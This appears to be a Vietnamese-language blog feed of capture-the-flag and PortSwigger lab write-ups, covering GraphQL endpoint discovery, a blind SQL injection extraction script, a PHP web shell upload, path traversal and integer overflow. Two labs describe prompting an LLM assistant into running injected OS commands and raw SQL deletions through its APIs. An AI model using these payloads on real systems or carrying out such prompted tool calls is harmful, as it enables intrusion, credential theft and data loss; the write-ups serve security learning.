Forem: tRavOndAtrACk

Lab: Finding a hidden GraphQL endpoint

tRavOndAtrACk — Wed, 14 Jan 2026 05:03:49 +0000

Author: travondatrack
Date: 14/01/2026
Category: Pentest | Web | Security
Difficulty: PRACTITIONER
Tags: GraphQL

Mô tả

The user management functions for this lab are powered by a hidden GraphQL endpoint. You won't be able to find this endpoint by simply clicking pages in the site. The endpoint also has some defenses against introspection.

To solve the lab, find the hidden endpoint and delete carlos.

Link: https://portswigger.net/web-security/graphql/lab-graphql-find-the-endpoint

Phân tích vấn đề

Recon

Lab không expose endpoint GraphQL rõ ràng (không có /graphql, /graphiql, v.v.).
Ta cần thử các path phổ biến.

COMMON_GRAPHQL_PATHS = [
    "/api",
    "/graphql",
    "/api/graphql",
    "/v1/graphql",
    "/v2/graphql",
    "/gql"
]

Khai thác

Bước 1: Scanning for hidden GraphQL endpoint

Viết script Python để tìm endpoint.

import requests

BASE_URL = "https://0a0a00d00322650a805644e4006800a4.web-security-academy.net"

# Cookie lấy từ request /login
COOKIES = {
    "session": "XHAvkzbOEaTNhOHFhW6sCjzHp1nRV6a1"
}

HEADERS = {
    "User-Agent": "Mozilla/5.0",
    "Accept": "application/json"
}

# Các endpoint hay gặp trong thực tế
COMMON_GRAPHQL_PATHS = [
    "/api",
    "/graphql",
    "/api/graphql",
    "/v1/graphql",
    "/v2/graphql",
    "/gql"
]

TEST_QUERY = "query{__typename}"

def is_graphql_endpoint(path):
    url = BASE_URL + path
    params = {"query": TEST_QUERY}

    try:
        r = requests.get(
            url,
            headers=HEADERS,
            cookies=COOKIES,
            params=params,
            timeout=5
        )

        if r.status_code == 200 and "__typename" in r.text:
            print(f"[+] GraphQL endpoint FOUND: {path}")
            print(r.text)
            return True
        else:
            print(f"[-] {path} -> Not GraphQL")

    except Exception as e:
        print(f"[!] {path} -> Error: {e}")

    return False


if __name__ == "__main__":
    print("[*] Scanning for hidden GraphQL endpoint...\n")

    for path in COMMON_GRAPHQL_PATHS:
        if is_graphql_endpoint(path):
            break

Kết quả tìm được.

Bước 2: Bypass introspection defense

Thử gửi introspection query chuẩn

Server dùng regex đơn giản để block chuỗi "__schema{". GraphQL bỏ qua whitespace/newline, nhưng regex có thể không xử lý tốt

==> Bybass bằng \n

Sau khi có được schema, ta thấy có 1 mutation nguy hiểm "name": "deleteOrganizationUser".
Ta cần tìm id của carlos để xóa.

query {
  getUser(id: ...) {
    id
    username
  }
}

Submit

Xóa tài khoản carlos thông qua deleteOrganizationUser.

==> DONE!

Lab: Accidental exposure of private GraphQL fields

tRavOndAtrACk — Wed, 14 Jan 2026 04:26:02 +0000

Author: travondatrack
Date: 14/01/2026
Category: Pentest | Web | Security
Difficulty: PRACTITIONER
Tags: GraphQL

Mô tả

The user management functions for this lab are powered by a GraphQL endpoint. The lab contains an access control vulnerability whereby you can induce the API to reveal user credential fields.

To solve the lab, sign in as the administrator and delete the username carlos.

Link: https://portswigger.net/web-security/graphql/lab-graphql-accidental-field-exposure

Phân tích vấn đề

Recon

Truy cập "My account" → thử login bất kỳ → request là POST GraphQL mutation với username/password.
Endpoint: /graphql
Login mutation không thành công nhưng vẫn đi qua GraphQL.
Introspection query bị bật → có thể khám phá toàn bộ schema.

Khai thác

Bước 1: Khám phá schema

Intercept login request (GraphQL mutation) → Send to Repeater
Right-click trong request body → GraphQL > Set introspection query
Send → response trả về full schema
Sử dụng extension InQL để dễ dàng xem schema.

Bước 2: Lấy credential của administrator

Nhập bừa tài khoản để bắt URL.

Dễ dàng nhận thấy GraphQL Introspection bị bật công khai. Dùng extension InQL để xem rõ schema.

Trong getUser có chứa cái field nhạy cảm.

Mẫu truy vấn có dạng:


query {
  getUser(id: ...) {
    username
    password
  }
}

Thử truy vấn với id=1.

==> Lộ username + password của admin.

### Submit

==> DONE!

Lab: Accessing private GraphQL posts

tRavOndAtrACk — Wed, 14 Jan 2026 03:36:30 +0000

Author: travondatrack
Date: 14/01/2026
Category: Pentest | Web | Security
Difficulty: Easy
Tags: GraphQL

Mô tả

The blog page for this lab contains a hidden blog post that has a secret password. To solve the lab, find the hidden blog post and enter the password.

Link: https://portswigger.net/web-security/graphql/lab-graphql-reading-private-posts

Phân tích vấn đề

Recon

Truy cập blog page → các bài post được load qua POST request tới /graphql/v1
Trong response, các post có ID tuần tự: 1, 2, 4, 5... → thiếu ID 3 → nghi ngờ có post ẩn với ID = 3

Post 3 bị ẩn

Khai thác

Bước 1: Chèn 1 query đặc biệt

Trong Repeater, right-click → GraphQL > Set introspection query
Send request → response trả về full schema

Tìm type BlogPost → phát hiện field postPassword tồn tại

Bước 2: Query post ẩn với ID = 3 và lấy postPassword

Trong Repeater, chuyển sang tab GraphQL
Variables panel: thay "id": 1 thành "id": 3
Query panel: thêm field postPassword vào bên trong getBlogPost(id: $id)

query {
  getBlogPost(id: 3) {
    id
    title
    isPrivate
    postPassword
    summary
  }
}

--> Đã lấy được mật khẩu của post có id=3.
### Submit

Simple Blind SQL Injection

tRavOndAtrACk — Tue, 30 Dec 2025 18:10:08 +0000

	Nội dung
Tên	Simple Blind SQL Injection
Mô tả	Khai thác lỗ hổng Blind SQL Injection để lấy mật khẩu admin, sau đó đăng nhập tại `/login` để lấy flag
Tag	Web, SQL Injection, Blind SQL Injection
Link	https://battle.cookiearena.org/challenges/web/simple-blind-sql-injection

1. Phân tích lỗ hổng

Trang web nhận tham số uid qua HTTP GET.

Thử payload:

admin' AND 1=1 --

Kết quả:

Thử thêm 1 payload khác:

admin' AND 1=2 --

Kết quả:

→ Không trả về exists.

Kết luận

Backend có truy vấn SQL dạng:

SELECT * FROM users WHERE uid = '$uid';

→ Blind SQL Injection dạng boolean

2. Chiến lược khai thác

Xác định độ dài mật khẩu bằng LENGTH(upw)
Trích xuất từng ký tự bằng SUBSTRING(upw, position, 1)
So sánh với charset đã biết
Dựa vào chuỗi phản hồi "exists" để xác định điều kiện đúng

3. Khai thác chi tiết

3.1. Xác định độ dài mật khẩu

Payload mẫu:

admin' AND LENGTH(upw)=N --

Tăng dần N cho đến khi server trả về "exists".

3.2. Trích xuất mật khẩu từng ký tự

Payload tại vị trí i:

admin' AND SUBSTRING(upw,i,1)='c' --

Duyệt toàn bộ charset [a-z0-9_] cho mỗi vị trí.

4. Script exploit

import requests
import string

URL = "http://103.97.125.56:30536/"
TRUE_TEXT = "exists"

charset = string.ascii_lowercase + string.digits + "_"

def is_true(payload):
    params = {
        "uid": payload
    }
    r = requests.get(URL, params=params, timeout=5)
    return TRUE_TEXT in r.text


def get_length(max_len=50):
    print("[*] Đang xác định độ dài mật khẩu...")
    for length in range(1, max_len + 1):
        payload = f"admin' AND LENGTH(upw)={length} -- "
        if is_true(payload):
            print(f"[+] Độ dài mật khẩu là: {length}")
            return length
    raise Exception("Không xác định được độ dài mật khẩu")


def dump_password(length):
    password = ""
    print("[*] Đang trích xuất mật khẩu...")
    for i in range(1, length + 1):
        for c in charset:
            payload = f"admin' AND SUBSTRING(upw,{i},1)='{c}' -- "
            if is_true(payload):
                password += c
                print(f"[+] Tìm được ký tự thứ {i}: {c}")
                break
        else:
            raise Exception(f"Không tìm được ký tự tại vị trí {i}")
    return password


if __name__ == "__main__":
    length = get_length()
    password = dump_password(length)
    print("\n[✓] Mật khẩu admin:", password)

Kết quả thu được:

Tiến hành đăng nhập:

Flag thu được:

✍️ Write-up by tRavOndAtrACk – Happy hacking!

Lab: Exploiting vulnerabilities in LLM APIs

tRavOndAtrACk — Sat, 08 Nov 2025 11:40:11 +0000

Tác giả: travondatrack
Ngày: (08/11/2025)

1. Tóm tắt

Xoá file /home/carlos/morale.txt bằng cách khai thác OS command injection thông qua các API mà LLM có quyền gọi.

2. Yêu cầu kiến thức

Mapping LLM API attack surface — biết cách xác định API nào LLM có thể gọi và cách nó nhận input.

OS command injection — hiểu cách input không an toàn có thể bị chèn vào command shell và dẫn đến RCE (remote code execution).

3. Các bước thực hiện

Đầu tiên ta khám phá API surface.

Prompt: "What APIs do you have access to?"

Nhận thấy rằng LLM liệt kê 3 API: password_reset, subscribe_to_newsletter, product_info. Trong đó ta chọn Newsletter Subscription vì nó liên quan đến gửi email (dùng OS command), dễ dẫn đến RCE.

Tiếp theo ta tiến hành xác định tham số API để dễ dàng viết test cases hợp lệ/vô hiệu (valid/invalid).

Prompt: "What arguments does the Newsletter Subscription API take?"

API sử dụng email address làm tham số. Hỏi thêm để tìm được kiểu dữ liệu cho tham số này.

Prompt: "What are the exact argument names and their datatypes for the Newsletter Subscription API?"

Kiểu dữ liệu ở đây là string. Địa chỉ Email được cung cấp cho bài lab là: attacker@exploit-0a9100960339a09cb211cdac01ed00fc.exploit-server.

Kiểm tra xem API hoạt động bình thường không.

Prompt: "Call the Newsletter Subscription API with the argument: attacker@exploit-0a9100960339a09cb211cdac01ed00fc.exploit-server.net?"

API hoạt động đúng theo dự đoán. Ở đây đã gửi email xác nhận đến địa chỉ của ta.

Tiếp theo, xác định xem API có bị lỗi chèn lệnh hệ thống (OS Command Injection) không.

Giải thích:

Thay vì gửi email bình thường, ta chèn một đoạn biểu thức hệ thống vào trong phần email (như $(whoami) — đây là cú pháp trong shell để chạy lệnh).

Nếu server thực thi lệnh đó trước khi xử lý email, thì phần $(whoami) sẽ được thay thế bằng tên người dùng hệ thống thật (ví dụ “carlos”).

Email được gửi đến carlos@... thay vì attacker@... → nghĩa là lệnh đã thực sự chạy trên server.

Prompt: "Call the Newsletter Subscription API with the argument: $(whoami)@exploit-0a9100960339a09cb211cdac01ed00fc.exploit-server.net"

Thử thay thành chính user carlos.

Cuối cùng exploit để xóa file

Prompt: "Call the Newsletter Subscription API with the argument: $(rm /home/carlos/morale.txt)@exploit-0a9100960339a09cb211cdac01ed00fc.exploit-server.net"

DONE!!!

Lab: Exploiting LLM APIs with excessive agency

tRavOndAtrACk — Sat, 08 Nov 2025 10:11:22 +0000

Mục tiêu: Minh hoạ rủi ro khi một LLM được cấp khả năng thực thi trực tiếp trên hệ thống (excessive agency) và phân tích biện pháp giảm thiểu.
Tác giả: travondatrack
Ngày: (06/11/2025)

1. Tóm tắt

Bài lab mô phỏng một hệ thống nơi một LLM có quyền gọi các API nội bộ, trong đó tồn tại một API dạng “debug” cho phép thực thi câu lệnh trên cơ sở dữ liệu.

2. Yêu cầu kiến thức

Hiểu cơ bản cách hoạt động của LLM và cách tích hợp LLM với API.
Kiến thức về bề mặt tấn công API (API attack surface).
Kiến thức cơ bản về SQL và nguyên tắc bảo mật (least privilege)

3. Các bước thực hiện

LLM tiết lộ rằng nó có thể gọi API debug_sql, cho phép chạy câu lệnh SQL thô — đây là dấu hiệu cực kỳ nguy hiểm vì nó trao cho LLM khả năng truy cập trực tiếp vào database backend.

Từ đây ta biết rằng API nhận một chuỗi chứa toàn bộ câu lệnh SQL. Điều này đồng nghĩa với việc nếu LLM có quyền gọi API, nó có thể gửi bất kỳ câu lệnh SQL nào, bao gồm cả truy vấn đọc hoặc ghi dữ liệu. Đây là một lỗ hổng nghiêm trọng trong thiết kế quyền hạn của hệ thống.

Tiếp theo, truy vấn này hiển thị dữ liệu từ bảng users. Ta phát hiện ra có một người dùng tên carlos — đây là thông tin cần thiết để hoàn thành lab. Bước này chứng minh rằng LLM có thể đọc dữ liệu nhạy cảm trực tiếp từ database — vi phạm nguyên tắc phân quyền an toàn.

Đây là bước cuối cùng để hoàn thành lab. LLM đã gửi câu lệnh xóa trực tiếp qua API debug_sql và hệ thống xác nhận rằng người dùng “carlos” đã bị xóa khỏi database.

💣picoCTF: flag_shop

tRavOndAtrACk — Sun, 22 Jun 2025 08:30:19 +0000

Mục	Nội dung
Tên bài	flag_shop
Thể loại	General Skills
Link	https://play.picoctf.org/practice/challenge/49?originalEvent=1&page=3

📚 Lý thuyết

Khái niệm	Giải thích
Integer Overflow	Khi một biến số nguyên vượt quá giới hạn của kiểu dữ liệu, nó sẽ “quay vòng” thành số âm (trong two's complement).
Two’s Complement	Cách biểu diễn số âm phổ biến trong máy tính. Số lớn vượt ngưỡng sẽ bị hiểu nhầm là số âm.
Vấn đề ở đây	Biến số dư `balance` có thể bị overflow nếu cộng thêm số lớn, khiến ta vượt qua kiểm tra `balance >= FLAG_PRICE`.
Hậu quả	Người dùng có thể “mua” flag mà không đủ tiền, nhờ lỗi logic từ overflow.

🛡️ Thực hành

Source code:

#include <stdio.h>
#include <stdlib.h>
int main()
{
    setbuf(stdout, NULL);
    int con;
    con = 0;
    int account_balance = 1100;
    while(con == 0){

        printf("Welcome to the flag exchange\n");
        printf("We sell flags\n");

        printf("\n1. Check Account Balance\n");
        printf("\n2. Buy Flags\n");
        printf("\n3. Exit\n");
        int menu;
        printf("\n Enter a menu selection\n");
        fflush(stdin);
        scanf("%d", &menu);
        if(menu == 1){
            printf("\n\n\n Balance: %d \n\n\n", account_balance);
        }
        else if(menu == 2){
            printf("Currently for sale\n");
            printf("1. Defintely not the flag Flag\n");
            printf("2. 1337 Flag\n");
            int auction_choice;
            fflush(stdin);
            scanf("%d", &auction_choice);
            if(auction_choice == 1){
                printf("These knockoff Flags cost 900 each, enter desired quantity\n");

                int number_flags = 0;
                fflush(stdin);
                scanf("%d", &number_flags);
                if(number_flags > 0){
                    int total_cost = 0;
                    total_cost = 900*number_flags;
                    printf("\nThe final cost is: %d\n", total_cost);
                    if(total_cost <= account_balance){
                        account_balance = account_balance - total_cost;
                        printf("\nYour current balance after transaction: %d\n\n", account_balance);
                    }
                    else{
                        printf("Not enough funds to complete purchase\n");
                    }


                }
            }
            else if(auction_choice == 2){
                printf("1337 flags cost 100000 dollars, and we only have 1 in stock\n");
                printf("Enter 1 to buy one");
                int bid = 0;
                fflush(stdin);
                scanf("%d", &bid);

                if(bid == 1){

                    if(account_balance > 100000){
                        FILE *f = fopen("flag.txt", "r");
                        if(f == NULL){

                            printf("flag not found: please run this on the server\n");
                            exit(0);
                        }
                        char buf[64];
                        fgets(buf, 63, f);
                        printf("YOUR FLAG IS: %s\n", buf);
                        }

                    else{
                        printf("\nNot enough funds for transaction\n\n\n");
                    }}
            }
        }
        else{
            con = 1;
        }
    }
    return 0;
}

🔎 Phân tích

Ban đầu người dùng có số dư 1100. Flag "xịn" (1337 Flag) có giá 100000, nên về logic bình thường thì không thể mua được.

💡 Ý tưởng

Lổ hổng: int total_cost = 900 * number_flags;
Biến total_cost là kiểu int. Nếu number_flags lớn, total_cost sẽ bị overflow ==> có thể biến total_cost thành số âm → bypass điều kiện if(total_cost <= account_balance)

Điều này làm cho account_balance sau khi trừ tiền có thể trở thành số rất lớn, dù người dùng nhập số cực lớn. Sau đó quay lại mua 1337 Flag, kiểm tra account_balance > 100000 được thoả mãn!

🧪 Bước 2: Thực hiện

==> DONEEEE!

Cần kiểm tra cẩn thận input và dùng kiểu dữ liệu an toàn (long long, unsigned long,...) nếu cần.

✍️ Write-up by tRavOndAtrACk – Happy hacking!

🏷️picoCTF: Glory of the Garden

tRavOndAtrACk — Sun, 22 Jun 2025 07:38:34 +0000

Mục	Nội dung
Description	This garden contains more than it seems.
Hints	What is a hex editor?
Tag	Forensics
Link	https://play.picoctf.org/practice/challenge/44?originalEvent=1&page=1

📘 Lý thuyết

Hex Editor là công cụ giúp bạn xem và chỉnh sửa nội dung nhị phân (hex) của một file. Nó thường được sử dụng để phát hiện:

Chuỗi ẩn (flag, thông tin lạ)
Dữ liệu nhúng không hiển thị trên giao diện thông thường
Metadata và nội dung ở cuối file

🧪 Thực hành

Gợi ý "What is a hex editor?" cho thấy chúng ta cần kiểm tra file bằng công cụ hex.
Truy cập trang: https://hexed.it
Tải ảnh từ đề bài lên và tìm kiếm các chuỗi quen thuộc như pico, flag, {, CTF.

💡 Ghi chú: Trong các bài Forensics cơ bản, luôn thử mở file bằng các công cụ sau:

hexed.it – mở hex trực tuyến

strings – tìm chuỗi có thể đọc được

exiftool – kiểm tra metadata

binwalk – trích xuất dữ liệu nhúng

✍️ Write-up by tRavOndAtrACk – Happy hacking!

🏷️picoCTF: logon

tRavOndAtrACk — Sun, 22 Jun 2025 07:02:24 +0000

Mục	Nội dung
Tên bài	Logon
Thể loại	Web Exploitation
Link	https://play.picoctf.org/practice/challenge/46?originalEvent=1&page=1

📚 Lý thuyết

Khái niệm	Giải thích
Authentication	Xác thực người dùng (kiểm tra đúng mật khẩu)
Authorization	Phân quyền truy cập (được xem flag hay không)
Vấn đề ở đây	Server tin vào cookie `admin` từ phía client mà không kiểm tra lại từ cơ sở dữ liệu hoặc session thật.
Hậu quả	Người dùng có thể sửa cookie để "giả làm admin" và xem flag.

🛡️ Thực hành

Chỉnh admin=False → admin=True

==> DONEEEE!

🏁: picoCTF{th3_c0nsp1r4cy_l1v3s_6edb3f5f}

✅ Đánh giá

Đây là lỗi logic trong phân quyền
Cookie có thể bị sửa từ phía client → không nên tin tưởng
Bài học: luôn thực hiện kiểm tra quyền truy cập từ phía server

✍️ Write-up by tRavOndAtrACk – Happy hacking!

Challenge: Upload File Path Traversal

tRavOndAtrACk — Thu, 12 Jun 2025 05:06:25 +0000

Link: https://battle.cookiearena.org/challenges/web/upload-file-path-traversal

You cannot execute a Web Shell in the current upload directory. Find a way to upload and execute

Tài liệu tham khảo
https://cookiearena.org/hoc-pentester/lo-hong-file-path-traversal/
https://portswigger.net/web-security/file-upload
https://portswigger.net/web-security/file-path-traversal

Check script

    <script>
    $(function() {
      // Handle the form submit event
      $('#uploadForm').submit(function(event) {
        // Prevent the default form submission
        event.preventDefault();

        // Get the form data
        let formData = new FormData(this);

        // Check the file type
        let file = formData.get('file');
        if (!file.type.match(/^image\/(jpeg|gif|png)$/)) {
          alert('Invalid file type');
          return;
        }

        // Submit the form data to upload.php
        $.ajax({
          url: 'upload.php',
          type: 'POST',
          data: formData,
          processData: false,
          contentType: false,
          success: function(data) {
            var data = jQuery.parseJSON(data);                        
            if (data.success) {
              // Create a list item for the uploaded file
              let fileList = '';
              fileList += '<p> <a href="' + data.file + '" target="_blank">' + data.file + '</a></p>';
              console.log('ok');
              console.log(fileList);

              // Update the file list
              $('#fileList').append(fileList);
            } else {
              // Handle the error
            }
          }
        });
      });
    });
    </script>

Dựa trên đoạn script và giao diện ban đầu thì có thể thấy có kiểm tra kiểu MIME của file, chỉ chấp nhận các định dạng: jpeg, gif, png.

Upload lên xem thử

Dùng Burp bắt

Đổi đuôi thành .php ==> có thể upload được file .php

Spam Payload Timeeeee!

==> Lẻn vào thành công

NOTE

Trong quá trình kiểm thử bảo mật ứng dụng web, một kỹ thuật phổ biến là tìm cách tải lên một file độc hại (malicious file) để thực thi mã từ phía máy chủ. Sau khi việc upload thành công, bước tiếp theo là sử dụng một payload PHP nhằm thực thi lệnh hệ thống từ xa (RCE - Remote Command Execution).

Ở đây mình dùng payload này:

<?php echo system($_GET['cmd']); ?>

Payload này cho phép thực thi bất kỳ lệnh hệ thống nào được truyền qua URL dạng

http://<host>/<upload_path>/shell.php?cmd=ls

Chúng ta sử dụng tham số cmd để thực thi chuỗi lệnh hệ thống thông qua URL:

?cmd=cd .. ;ls

Đã thấy 2 file có khả năng chứa flag: flag.txt và flagewpxH.txt. Giờ thì chỉ việc khui file này ra và lấy flag thui hẹ hẹ hẹ -.-
Payload: ?cmd=cd .. ;cat flagewpxH.txt

==> DONEEEE!
FLAG: CHH{uPl04d_vIA_P4tH_Trav3r54L_5687373208091ec49a924794b340ff97}

Challenge: File Download

tRavOndAtrACk — Tue, 10 Jun 2025 15:57:13 +0000

Link: https://battle.cookiearena.org/challenges/web/file-download

You can upload and download file. Try to get the /flag.txt

Phân tích lỗ hổng

Dòng code:

<li><a href="/read?name=sad">sad</a></li>

URL này cho thấy ứng dụng đang nhận một tham số name qua query string và có thể sử dụng giá trị này để đọc một file nào đó từ server. Nếu phía backend không xử lý tốt đầu vào của người dùng, thì đây là một điểm rất dễ bị tấn công path traversal.

Thử khai thác thông qua: http://[target]/read?name=../../../../etc/passwd

==> Đã bị khai thác thành công

Thử với payload: /read?name=../../../../flag.txt

==> DONEEE!

==> FLAG: CHH{eASy_DoWN104d_F1L3_83aca8177bef161dae4bdb4b5aa9ce67}

Challenge: Under Construction

tRavOndAtrACk — Tue, 10 Jun 2025 15:31:50 +0000

Link: https://battle.cookiearena.org/challenges/web/under-construction
Try to read /flag.txt

Phân tích lổ hổng
File image.jsp

<%@ page trimDirectiveWhitespaces="true" %>
<%
String filepath = getServletContext().getRealPath("resources") + "/";
String _file = request.getParameter("file");

response.setContentType("image/jpeg");
try{
    java.io.FileInputStream fileInputStream = new java.io.FileInputStream(filepath + _file);
    int i;   
    while ((i = fileInputStream.read()) != -1) {  
        out.write(i);
    }   
    fileInputStream.close();
}catch(Exception e){
    response.sendError(404, "Not Found !" );
}
%>

Lỗ hổng Path Traversal ở đâu?
FileInputStream fileInputStream = new FileInputStream(filepath + _file);

Không hề có kiểm tra nào với giá trị _file. Không kiểm tra ký tự ... Không kiểm tra rằng _file nằm bên trong thư mục /resources/
👉 Hệ quả:
Có thể truyền file=../../../../../../flag.txt để chui ra ngoài thư mục /resources/, truy cập vào bất kỳ file nào mà tiến trình web server có quyền đọc

==> Dùng burp bắt tới URL http://103.97.125.56:31999/image.jsp?file=../../../../../../flag.txt

==> FLAG: CHH{unD3R_cOns7rUcTI0N_cc2880e4ca1818f66e64c626e0b075d7}